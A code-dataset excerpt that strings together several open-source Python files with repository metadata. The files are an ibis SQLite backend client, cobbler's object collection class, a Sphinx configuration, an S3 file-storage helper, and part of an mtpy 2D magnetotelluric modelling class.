# input_array2 = [2, 5, 33, 2, 17, 5, 2]
# t.quickSort2(input_array2, 0, len(input_array2) - 1)
# print(input_array2)
| gpl-2.0 | 81,288,053,263,669,400 | 26.5 | 84 | 0.447603 | false |
cloudera/ibis | ibis/backends/sqlite/client.py | 1 | 9430 | import errno
import functools
import inspect
import math
import os
from typing import Optional
import regex as re
import sqlalchemy as sa
import ibis.backends.base_sqlalchemy.alchemy as alch
from ibis.client import Database
from .compiler import SQLiteDialect
class SQLiteTable(alch.AlchemyTable):
pass
class SQLiteDatabase(Database):
pass
_SQLITE_UDF_REGISTRY = set()
_SQLITE_UDAF_REGISTRY = set()
def udf(f):
"""Create a SQLite scalar UDF from `f`
Parameters
----------
f
A callable object
Returns
-------
callable
A callable object that returns ``None`` if any of its inputs are
``None``.
"""
@functools.wraps(f)
def wrapper(*args):
if any(arg is None for arg in args):
return None
return f(*args)
_SQLITE_UDF_REGISTRY.add(wrapper)
return wrapper
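# Minimal sketch of defining an extra scalar UDF with the decorator above. The
# function name and body are assumptions added for illustration; they are not
# part of the original backend:
#
#     @udf
#     def _ibis_sqlite_add_one(arg):
#         return arg + 1
#
# The wrapper returns None when any argument is None (SQL NULL propagation) and
# the function is added to _SQLITE_UDF_REGISTRY at import time.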
def udaf(cls):
"""Register a UDAF class with any SQLite connection."""
_SQLITE_UDAF_REGISTRY.add(cls)
return cls
@udf
def _ibis_sqlite_reverse(string):
return string[::-1]
@udf
def _ibis_sqlite_string_ascii(string):
return ord(string[0])
@udf
def _ibis_sqlite_capitalize(string):
return string.capitalize()
@udf
def _ibis_sqlite_translate(string, from_string, to_string):
table = str.maketrans(from_string, to_string)
return string.translate(table)
@udf
def _ibis_sqlite_regex_search(string, regex):
"""Return whether `regex` exists in `string`.
Parameters
----------
string : str
regex : str
Returns
-------
found : bool
"""
return re.search(regex, string) is not None
@udf
def _ibis_sqlite_regex_replace(string, pattern, replacement):
"""Replace occurences of `pattern` in `string` with `replacement`.
Parameters
----------
string : str
pattern : str
replacement : str
Returns
-------
result : str
"""
return re.sub(pattern, replacement, string)
@udf
def _ibis_sqlite_regex_extract(string, pattern, index):
"""Extract match of regular expression `pattern` from `string` at `index`.
Parameters
----------
string : str
pattern : str
index : int
Returns
-------
result : str or None
"""
result = re.search(pattern, string)
if result is not None and 0 <= index <= (result.lastindex or -1):
return result.group(index)
return None
@udf
def _ibis_sqlite_exp(arg):
"""Exponentiate `arg`.
Parameters
----------
arg : number
Exponent to raise `e` to.
Returns
-------
result : Optional[number]
None If the input is None
"""
return math.exp(arg)
@udf
def _ibis_sqlite_log(arg, base):
if arg < 0 or base < 0:
return None
return math.log(arg, base)
@udf
def _ibis_sqlite_ln(arg):
if arg < 0:
return None
return math.log(arg)
@udf
def _ibis_sqlite_log2(arg):
return _ibis_sqlite_log(arg, 2)
@udf
def _ibis_sqlite_log10(arg):
return _ibis_sqlite_log(arg, 10)
@udf
def _ibis_sqlite_floor(arg):
return math.floor(arg)
@udf
def _ibis_sqlite_ceil(arg):
return math.ceil(arg)
@udf
def _ibis_sqlite_sign(arg):
if not arg:
return 0
return math.copysign(1, arg)
@udf
def _ibis_sqlite_floordiv(left, right):
return left // right
@udf
def _ibis_sqlite_mod(left, right):
return left % right
@udf
def _ibis_sqlite_power(arg, power):
"""Raise `arg` to the `power` power.
Parameters
----------
arg : number
Number to raise to `power`.
power : number
Number to raise `arg` to.
Returns
-------
result : Optional[number]
None if either argument is None or if we are trying to take a
fractional power of a negative number
"""
if arg < 0.0 and not power.is_integer():
return None
return arg ** power
@udf
def _ibis_sqlite_sqrt(arg):
"""Square root of `arg`.
Parameters
----------
arg : Optional[number]
Number to take the square root of
Returns
-------
result : Optional[number]
None if `arg` is None or less than 0 otherwise the square root
"""
return None if arg is None or arg < 0.0 else math.sqrt(arg)
class _ibis_sqlite_var:
def __init__(self, offset):
self.mean = 0.0
self.sum_of_squares_of_differences = 0.0
self.count = 0
self.offset = offset
def step(self, value):
if value is not None:
self.count += 1
delta = value - self.mean
self.mean += delta / self.count
self.sum_of_squares_of_differences += delta * (value - self.mean)
def finalize(self):
count = self.count
if count:
return self.sum_of_squares_of_differences / (count - self.offset)
return None
@udaf
class _ibis_sqlite_var_pop(_ibis_sqlite_var):
def __init__(self):
super().__init__(0)
@udaf
class _ibis_sqlite_var_samp(_ibis_sqlite_var):
def __init__(self):
super().__init__(1)
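# Once registered on a connection, the aggregate classes above are callable from
# SQL by class name, e.g. (illustrative query; table and column names are
# assumptions):
#
#     SELECT _ibis_sqlite_var_pop(value) FROM t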
def number_of_arguments(callable):
signature = inspect.signature(callable)
parameters = signature.parameters.values()
kinds = [param.kind for param in parameters]
valid_kinds = (
inspect.Parameter.POSITIONAL_OR_KEYWORD,
inspect.Parameter.POSITIONAL_ONLY,
)
if any(kind not in valid_kinds for kind in kinds) or any(
param.default is not inspect.Parameter.empty for param in parameters
):
raise TypeError(
'Only positional arguments without defaults are supported in Ibis '
'SQLite function registration'
)
return len(parameters)
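# For example (illustrative only): number_of_arguments(lambda x, y: x + y) == 2,
# while callables with keyword-only or defaulted parameters raise TypeError,
# because SQLite UDF registration needs a fixed positional arity.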
def _register_function(func, con):
"""Register a Python callable with a SQLite connection `con`.
Parameters
----------
func : callable
con : sqlalchemy.Connection
"""
nargs = number_of_arguments(func)
con.connection.connection.create_function(func.__name__, nargs, func)
def _register_aggregate(agg, con):
"""Register a Python class that performs aggregation in SQLite.
Parameters
----------
agg : type
con : sqlalchemy.Connection
"""
nargs = number_of_arguments(agg.step) - 1 # because self
con.connection.connection.create_aggregate(agg.__name__, nargs, agg)
class SQLiteClient(alch.AlchemyClient):
"""The Ibis SQLite client class."""
dialect = SQLiteDialect
database_class = SQLiteDatabase
table_class = SQLiteTable
def __init__(self, path=None, create=False):
super().__init__(sa.create_engine("sqlite://"))
self.name = path
self.database_name = "base"
if path is not None:
self.attach(self.database_name, path, create=create)
for func in _SQLITE_UDF_REGISTRY:
self.con.run_callable(functools.partial(_register_function, func))
for agg in _SQLITE_UDAF_REGISTRY:
self.con.run_callable(functools.partial(_register_aggregate, agg))
@property
def current_database(self) -> Optional[str]:
return self.database_name
def list_databases(self):
raise NotImplementedError(
'Listing databases in SQLite is not implemented'
)
def set_database(self, name: str) -> None:
raise NotImplementedError('set_database is not implemented for SQLite')
def attach(self, name, path, create: bool = False) -> None:
"""Connect another SQLite database file
Parameters
----------
name : string
Database name within SQLite
path : string
Path to sqlite3 file
create : boolean, optional
If file does not exist, create file if True otherwise raise an
Exception
"""
if not os.path.exists(path) and not create:
raise FileNotFoundError(
errno.ENOENT, os.strerror(errno.ENOENT), path
)
quoted_name = self.con.dialect.identifier_preparer.quote(name)
self.raw_sql(
"ATTACH DATABASE {path!r} AS {name}".format(
path=path, name=quoted_name
)
)
self.has_attachment = True
@property
def client(self):
return self
def _get_sqla_table(self, name, schema=None, autoload=True):
return sa.Table(
name,
self.meta,
schema=schema or self.current_database,
autoload=autoload,
)
def table(self, name, database=None):
"""
Create a table expression that references a particular table in the
SQLite database
Parameters
----------
name : string
database : string, optional
name of the attached database that the table is located in.
Returns
-------
TableExpr
"""
alch_table = self._get_sqla_table(name, schema=database)
node = self.table_class(alch_table, self)
return self.table_expr_class(node)
def list_tables(self, like=None, database=None, schema=None):
if database is None:
database = self.database_name
return super().list_tables(like, schema=database)
def _table_from_schema(
self, name, schema, database: Optional[str] = None
) -> sa.Table:
columns = self._columns_from_schema(name, schema)
return sa.Table(name, self.meta, schema=database, *columns)
| apache-2.0 | -6,957,263,060,061,383,000 | 21.613909 | 79 | 0.605408 | false |
remotesyssupport/cobbler-template-files | cobbler/collection.py | 1 | 13689 | """
Base class for any serializable list of things...
Copyright 2006-2008, Red Hat, Inc
Michael DeHaan <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA
"""
import exceptions
from cexceptions import *
import serializable
import utils
import glob
import sub_process
import action_litesync
import item_system
import item_profile
import item_distro
import item_repo
import item_image
from utils import _
class Collection(serializable.Serializable):
def __init__(self,config):
"""
Constructor.
"""
self.config = config
self.clear()
self.api = self.config.api
self.log_func = self.api.log
self.lite_sync = None
def factory_produce(self,config,seed_data):
"""
Must override in subclass. Factory_produce returns an Item object
from datastructure seed_data
"""
raise exceptions.NotImplementedError
def clear(self):
"""
Forget about objects in the collection.
"""
self.listing = {}
def find(self, name=None, return_list=False, no_errors=False, **kargs):
"""
Return first object in the collection that matches all item='value'
pairs passed, else return None if no objects can be found.
When return_list is set, can also return a list. Empty list
would be returned instead of None in that case.
"""
matches = []
# support the old style invocation without kwargs
if name is not None:
kargs["name"] = name
kargs = self.__rekey(kargs)
# no arguments is an error, so we don't return a false match
if len(kargs) == 0:
raise CX(_("calling find with no arguments"))
# performance: if the only key is name we can skip the whole loop
if len(kargs) == 1 and kargs.has_key("name") and not return_list:
return self.listing.get(kargs["name"].lower(), None)
for (name, obj) in self.listing.iteritems():
if obj.find_match(kargs, no_errors=no_errors):
matches.append(obj)
if not return_list:
if len(matches) == 0:
return None
return matches[0]
else:
return matches
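# Illustrative calls (names and attribute values below are assumptions):
#
#     systems.find("vanhalen")                       -> single object or None
#     systems.find(mac="AA:BB:CC:DD:EE:FF")          -> first match or None
#     systems.find(mac="AA:BB:CC:DD:EE:FF", return_list=True) -> possibly empty list
#
# Command-line style keys such as "mac" or "kopts" are remapped to the internal
# field names by __rekey() below.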
SEARCH_REKEY = {
'kopts' : 'kernel_options',
'kopts_post' : 'kernel_options_post',
'ksmeta' : 'ks_meta',
'inherit' : 'parent',
'ip' : 'ip_address',
'mac' : 'mac_address',
'virt-file-size' : 'virt_file_size',
'virt-ram' : 'virt_ram',
'virt-path' : 'virt_path',
'virt-type' : 'virt_type',
'virt-bridge' : 'virt_bridge',
'virt-cpus' : 'virt_cpus',
'dhcp-tag' : 'dhcp_tag',
'netboot-enabled' : 'netboot_enabled'
}
def __rekey(self,hash):
"""
Find calls from the command line ("cobbler system find")
don't always match with the keys from the datastructs and this
makes them both line up without breaking compatibility with either.
Thankfully we don't have a LOT to remap.
"""
newhash = {}
for x in hash.keys():
if self.SEARCH_REKEY.has_key(x):
newkey = self.SEARCH_REKEY[x]
newhash[newkey] = hash[x]
else:
newhash[x] = hash[x]
return newhash
def to_datastruct(self):
"""
Serialize the collection
"""
datastruct = [x.to_datastruct() for x in self.listing.values()]
return datastruct
def from_datastruct(self,datastruct):
if datastruct is None:
return
for seed_data in datastruct:
item = self.factory_produce(self.config,seed_data)
self.add(item)
def rename(self,ref,newname,with_sync=True,with_triggers=True):
"""
Allows an object "ref" to be given a newname without affecting the rest
of the object tree.
"""
# make a copy of the object, but give it a new name.
oldname = ref.name
newref = ref.make_clone()
newref.set_name(newname)
self.add(newref, with_triggers=with_triggers,save=True)
# now descend to any direct descendants and point them at the new object allowing
# the original object to be removed without orphanage. Direct descendants
# will either be profiles or systems. Note that we do have to care as
# set_parent is only really meaningful for subprofiles. We ideally want a more
# generic set_parent.
kids = ref.get_children()
for k in kids:
if k.COLLECTION_TYPE == "distro":
raise CX(_("internal error, not expected to have distro child objects"))
elif k.COLLECTION_TYPE == "profile":
if k.parent != "":
k.set_parent(newname)
else:
k.set_distro(newname)
self.api.profiles().add(k, save=True, with_sync=with_sync, with_triggers=with_triggers)
elif k.COLLECTION_TYPE == "system":
k.set_profile(newname)
self.api.systems().add(k, save=True, with_sync=with_sync, with_triggers=with_triggers)
elif k.COLLECTION_TYPE == "repo":
raise CX(_("internal error, not expected to have repo child objects"))
else:
raise CX(_("internal error, unknown child type (%s), cannot finish rename" % k.COLLECTION_TYPE))
# now delete the old version
self.remove(oldname, with_delete=True, with_triggers=with_triggers)
return True
def add(self,ref,save=False,with_copy=False,with_triggers=True,with_sync=True,quick_pxe_update=False,check_for_duplicate_names=False,check_for_duplicate_netinfo=False):
"""
Add an object to the collection, if it's valid. Returns True
if the object was added to the collection. Returns False if the
object specified by ref deems itself invalid (and therefore
won't be added to the collection).
with_copy is a bit of a misnomer, but lots of internal add operations
can run with "with_copy" as False. True means a real final commit, as if
entered from the command line (or basically, by a user).
With with_copy as False, the particular add call might just be being run
during deserialization, in which case extra semantics around the add don't really apply.
So, in that case, don't run any triggers and don't deal with any actual files.
"""
if self.lite_sync is None:
self.lite_sync = action_litesync.BootLiteSync(self.config)
# migration path for old API parameter that I've renamed.
if with_copy and not save:
save = with_copy
if not save:
# for people that aren't quite aware of the API
# if not saving the object, you can't run these features
with_triggers = False
with_sync = False
# Avoid adding objects to the collection
# if an object with the same name/ip/mac already exists.
self.__duplication_checks(ref,check_for_duplicate_names,check_for_duplicate_netinfo)
if ref is None or not ref.is_valid():
raise CX(_("insufficient or invalid arguments supplied"))
if ref.COLLECTION_TYPE != self.collection_type():
raise CX(_("API error: storing wrong data type in collection"))
if not save:
# don't need to run triggers, so add it already ...
self.listing[ref.name.lower()] = ref
# perform filesystem operations
if save:
self.log_func("saving %s %s" % (self.collection_type(), ref.name))
# failure of a pre trigger will prevent the object from being added
if with_triggers:
self._run_triggers(ref,"/var/lib/cobbler/triggers/add/%s/pre/*" % self.collection_type())
self.listing[ref.name.lower()] = ref
# save just this item if possible, if not, save
# the whole collection
self.config.serialize_item(self, ref)
if with_sync:
if isinstance(ref, item_system.System):
self.lite_sync.add_single_system(ref.name)
elif isinstance(ref, item_profile.Profile):
self.lite_sync.add_single_profile(ref.name)
elif isinstance(ref, item_distro.Distro):
self.lite_sync.add_single_distro(ref.name)
elif isinstance(ref, item_image.Image):
self.lite_sync.add_single_image(ref.name)
elif isinstance(ref, item_repo.Repo):
pass
else:
print _("Internal error. Object type not recognized: %s") % type(ref)
if not with_sync and quick_pxe_update:
if isinstance(ref, item_system.System):
self.lite_sync.update_system_netboot_status(ref.name)
# save the tree, so if necessary, scripts can examine it.
if with_triggers:
self._run_triggers(ref,"/var/lib/cobbler/triggers/add/%s/post/*" % self.collection_type())
# update children cache in parent object
parent = ref.get_parent()
if parent != None:
parent.children[ref.name] = ref
return True
def _run_triggers(self,ref,globber):
return utils.run_triggers(ref,globber)
def __duplication_checks(self,ref,check_for_duplicate_names,check_for_duplicate_netinfo):
"""
Prevents adding objects with the same name.
Prevents adding or editing to provide the same IP, or MAC.
Enforcement is based on whether the API caller requests it.
"""
# always protect against duplicate names
if check_for_duplicate_names:
match = None
if isinstance(ref, item_system.System):
match = self.api.find_system(ref.name)
elif isinstance(ref, item_profile.Profile):
match = self.api.find_profile(ref.name)
elif isinstance(ref, item_distro.Distro):
match = self.api.find_distro(ref.name)
elif isinstance(ref, item_repo.Repo):
match = self.api.find_repo(ref.name)
if match:
raise CX(_("An object already exists with that name. Try 'edit'?"))
# the duplicate mac/ip checks can be disabled.
if not check_for_duplicate_netinfo:
return
if isinstance(ref, item_system.System):
for (name, intf) in ref.interfaces.iteritems():
match_ip = []
match_mac = []
input_mac = intf["mac_address"]
input_ip = intf["ip_address"]
if not self.api.settings().allow_duplicate_macs and input_mac is not None and input_mac != "":
match_mac = self.api.find_system(mac_address=input_mac,return_list=True)
if not self.api.settings().allow_duplicate_ips and input_ip is not None and input_ip != "":
match_ip = self.api.find_system(ip_address=input_ip,return_list=True)
# it's ok to conflict with your own net info.
for x in match_mac:
if x.name != ref.name:
raise CX(_("Can't save system %s. The MAC address (%s) is already used by system %s (%s)") % (ref.name, intf["mac_address"], x.name, name))
for x in match_ip:
if x.name != ref.name:
raise CX(_("Can't save system %s. The IP address (%s) is already used by system %s (%s)") % (ref.name, intf["ip_address"], x.name, name))
def printable(self):
"""
Creates a printable representation of the collection suitable
for reading by humans or parsing from scripts. Actually scripts
would be better off reading the YAML in the config files directly.
"""
values = self.listing.values()[:] # copy the values
values.sort() # sort the copy (2.3 fix)
results = []
for i,v in enumerate(values):
results.append(v.printable())
if len(values) > 0:
return "\n\n".join(results)
else:
return _("No objects found")
def __iter__(self):
"""
Iterator for the collection. Allows list comprehensions, etc
"""
for a in self.listing.values():
yield a
def __len__(self):
"""
Returns size of the collection
"""
return len(self.listing.values())
def collection_type(self):
"""
Returns the string key for the name of the collection (for use in messages for humans)
"""
raise exceptions.NotImplementedError
| gpl-2.0 | 2,147,395,809,947,606,300 | 37.452247 | 172 | 0.587771 | false |
ericholscher/django-kong | docs/source/conf.py | 1 | 6608 | # -*- coding: utf-8 -*-
#
# Django Kong documentation build configuration file, created by
# sphinx-quickstart on Wed Nov 18 09:17:59 2009.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django Kong'
copyright = u'2009, Eric Holscher'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.9'
# The full version, including alpha/beta/rc tags.
release = '0.9'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'collapse_navigation': False,
}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoKongdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'DjangoKong.tex', u'Django Kong Documentation',
u'Eric Holscher', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
language = 'en'
| mit | 6,669,484,339,364,828,000 | 31.07767 | 80 | 0.714286 | false |
lakiw/cripts | cripts/core/s3_tools.py | 1 | 4177 | from django.conf import settings
from bson.objectid import ObjectId
import boto
from boto.s3.connection import S3Connection
from boto.s3.key import Key
class S3Error(Exception):
"""
Generic S3 Exception.
"""
pass
def s3_connector(bucket):
"""
Connect to an S3 bucket.
:param bucket: The bucket to connect to.
:type bucket: str
:returns: :class:`boto.s3.connection.S3Connection`, S3Error
"""
S3_hostname = getattr(settings, 'S3_HOSTNAME', S3Connection.DefaultHost)
try:
conn = S3Connection(aws_access_key_id = settings.AWS_ACCESS_KEY_ID,
aws_secret_access_key = settings.AWS_SECRET_ACCESS_KEY,
is_secure = True,
host = S3_hostname)
mybucket = conn.get_bucket(bucket)
return mybucket
except boto.exception.S3ResponseError as e:
raise S3Error("Error connecting to S3: %s" % e)
except:
raise
def s3_create_bucket(bucket):
"""
Create an S3 bucket.
:param bucket: The bucket to create.
:type bucket: str
:returns: S3Error
"""
try:
S3_hostname = getattr(settings, 'S3_HOSTNAME', S3Connection.DefaultHost)
conn = S3Connection(aws_access_key_id = settings.AWS_ACCESS_KEY_ID,
aws_secret_access_key = settings.AWS_SECRET_ACCESS_KEY,
is_secure = True,
host = S3_hostname)
conn.create_bucket(bucket)
except boto.exception.S3CreateError as e:
raise S3Error("Error creating bucket in S3: %s" % e)
except:
raise
def s3_translate_collection(collection):
"""
Translate CRIPs collection to S3 bucket.
:param collection: The collection to translate.
:type collection: str
:returns: str
"""
bucket = settings.COLLECTION_TO_BUCKET_MAPPING[collection.replace(".files","")]
return bucket + settings.S3_SEPARATOR + settings.S3_ID
def file_exists_s3(sample_md5, collection):
"""
    Determine if a file already exists in S3.
:param sample_md5: The MD5 to search for.
:type sample_md5: str
:param collection: The collection to translate for lookup.
:type collection: str
:returns: str
"""
bucket = s3_connector(s3_translate_collection(collection))
return bucket.get_key(sample_md5)
def put_file_s3(data, collection):
"""
Add a file to S3.
:param data: The data to add.
:type data: str
:param collection: The collection to translate for addition.
:type collection: str
:returns: str
"""
bucket = s3_connector(s3_translate_collection(collection))
k = Key(bucket)
oid = ObjectId()
k.key = oid
# TODO: pass md5 to put_file() to avoid recalculation.
k.set_contents_from_string(data)
return oid
def get_file_s3(oid, collection):
"""
Get a file from S3.
:param oid: The ObjectId to lookup.
:type oid: str
:param collection: The collection to translate for lookup.
:type collection: str
:returns: str
"""
bucket = s3_connector(s3_translate_collection(collection))
k = bucket.get_key(oid)
return k.get_contents_as_string()
def get_filename_s3(sample_md5, collection):
"""
Get a filename from S3.
:param sample_md5: The MD5 to lookup.
:type sample_md5: str
:param collection: The collection to translate for lookup.
:type collection: str
:returns: str
"""
try:
bucket = s3_connector(s3_translate_collection(collection))
k = bucket.get_key(sample_md5)
filename = k.get_metadata("filename")
except Exception:
return None
return filename
def delete_file_s3(sample_md5, collection):
"""
Remove a file from S3.
:param sample_md5: The MD5 to remove.
:type sample_md5: str
:param collection: The collection to translate for lookup.
:type collection: str
:returns: True, None
"""
try:
bucket = s3_connector(s3_translate_collection(collection))
k = bucket.get_key(sample_md5)
k.delete()
return True
except Exception:
return None
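# Illustrative usage sketch (not part of the original module). The collection name
# "sample.files" and the payload are assumptions; any collection present in
# settings.COLLECTION_TO_BUCKET_MAPPING would behave the same way:
#
#     oid = put_file_s3(b"some binary payload", "sample.files")
#     data = get_file_s3(oid, "sample.files")
#     delete_file_s3("d41d8cd98f00b204e9800998ecf8427e", "sample.files")  # hypothetical MD5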
| mit | 9,091,742,652,331,264,000 | 26.123377 | 83 | 0.629638 | false |
geophysics/mtpy | mtpy/modeling/pek2d.py | 1 | 20327 | # -*- coding: utf-8 -*-
"""
Created on Tue Oct 28 14:06:45 2014
@author: a1655681
"""
import mtpy.modeling.occam2d as o2d
import mtpy.modeling.pek1dclasses as p1dc
import numpy as np
import os
import os.path as op
import pek2dforward as p2d
import string
import scipy.interpolate as si
import mtpy.utils.filehandling as fh
import mtpy.core.edi as mtedi
import mtpy.modeling.pek2dforward as p2d
class Model():
"""
class for creating and reading model files
"""
def __init__(self, working_directory, **input_parameters):
self.working_directory = working_directory
self.edi_directory = None
self.occam_configfile = None
self.parameters_ctl = {}
self.parameters_ctl['ctl_string'] = 'TAB'
self.parameters_ctl['units_string'] = 'PR'
self.parameters_ctl['quadrants'] = '++--'
self.parameters_ctl['orientation_string'] = '0 0.d0 0.d0'
self.parameters_ctl['convergence_string'] = '1 6 1.d-4'
self.parameters_ctl['roughness_string'] = '2 1000.0d0 1000.0d0 0.d0'
self.parameters_ctl['anisotropy_penalty_string'] = '2 1000.d0 0.d0'
self.parameters_ctl['anisotropy_ctl_string'] = '1.d0 1.d0 1.d0'
self.parameters_model = {}
self.parameters_model['no_sideblockelements'] = 5
self.parameters_model['no_bottomlayerelements'] = 4
self.parameters_model['firstlayer_thickness'] = 100
#model depth is in km!
self.parameters_model['model_depth'] = 100
self.parameters_model['no_layers'] = 25
self.parameters_model['max_blockwidth'] = 1000
self.parameters_data = {}
self.parameters_data['strike'] = 0.
self.parameters_data['errorfloor'] = dict(z=np.array([[0.05,0.05],
[0.05,0.05]]),
tipper=np.array([0.02,0.02]))
self.parameters_data['errorfloor_type'] = 'offdiagonals'# offdiagonals or relative
self.parameters_data['max_no_frequencies'] = 50
self.parameters_data['mode'] = [1,1,1,1,1,1]
self.n_airlayers = 5
self.mesh = None
self.meshlocations_x = None
self.meshlocations_z = None
self.meshblockwidths_x = None
self.meshblockthicknesses_z = None
self.profile_easts = None
self.profile_norths = None
self.inversion1d_dirdict = {}
self.inversion1d_masterdir = '.'
self.inversion1d_modelno = 0
self.inversion1d_imethod = 'nearest'
self.idir_basename = 'aniso'
self.binsize_resistivitylog10 = 1.
self.binsize_strike = 20.
self.build_from_1d = False
self.rotation = 0.
self.modelfile = 'model.dat'
self.anisotropy_min_depth = 0.
self.strike = 0.
self.edifiles = []
self.Data = None
self.modelfile = 'model'
self.resfile = 'pb.res'
self.cvgfile = 'pb.cvg'
self.outfile = 'pb.out'
self.pexfile = 'pb.pex'
self.andfile = 'pb.and'
self.exlfile = 'pb.exl'
update_dict = {}
#correcting dictionary for upper case keys
input_parameters_nocase = {}
for key in input_parameters.keys():
input_parameters_nocase[key.lower()] = input_parameters[key]
update_dict.update(input_parameters_nocase)
for dictionary in [self.parameters_model,self.parameters_data]:
for key in dictionary.keys():
if key in update_dict:
#check if entry exists:
try:
value = float(update_dict[key])
dictionary[key] = value
except:
value = update_dict[key]
dictionary[key] = value
if type(value) in [str]:
if value.strip().lower()=='none':
dictionary[key] = None
for key in update_dict:
try:
value = getattr(self,key)
if update_dict[key] is not None:
try:
value = float(update_dict[key])
setattr(self,key,value)
except:
value = update_dict[key]
setattr(self,key,value)
if type(value) in [str]:
if value.strip().lower()=='none':
setattr(self,key,None)
except:
continue
self.input_parameters = update_dict
print self.idir_basename
if self.edifiles == []:
if self.edi_directory is not None:
try:
self.edifiles = [op.join(self.edi_directory,
f) for f in os.listdir(self.edi_directory)]
except IOError:
print("failed to find edi directory")
pass
def build_inputfiles(self):
inversiondir = fh.make_unique_folder(self.working_directory,basename=self.idir_basename)
os.mkdir(op.join(self.working_directory,inversiondir))
self.working_directory = inversiondir
self.build_model()
self.write_modelfile()
self.write_datafiles()
self.write_ctlfile()
def read_model(self):
"""
use pek2d forward python setup code to read the model
"""
model = p2d.Model(working_directory = self.working_directory,
**self.input_parameters)
model.read_model()
for attr in ['meshblockwidths_x', 'meshblockthicknesses_z',
'meshlocations_x', 'meshlocations_z',
'modelblocknums', 'resistivity', 'sds',
'station_indices','modelfile_reslines',
'n_airlayers']:
try:
setattr(self,attr,getattr(model,attr))
except:
print "can't assign attribute {}".format(attr)
def read_outfile(self,chunk=1750,linelength=52):
"""
        read the outfile backwards and extract the last iteration
"""
# open outfile
outfile = open(op.join(self.working_directory,self.outfile))
if not hasattr(self,'modelblocknums'):
self.read_model()
elif self.modelblocknums is None:
self.read_model()
mb = np.sum(self.modelfile_reslines[:,-6:].astype(int))
        # read backwards from the end of the file, in chunks of `chunk` bytes, until a 4-column row is found
nn = 1
while True:
try:
outfile.seek(-nn, 2)
outfile.readline()
line = outfile.readline().strip().split()
n = outfile.tell()
if len(line) == 4:
break
nn += chunk
except:
print "invalid outfile, cannot read resistivity values from outfile yet"
return
m = 0
while line[0] != '1':
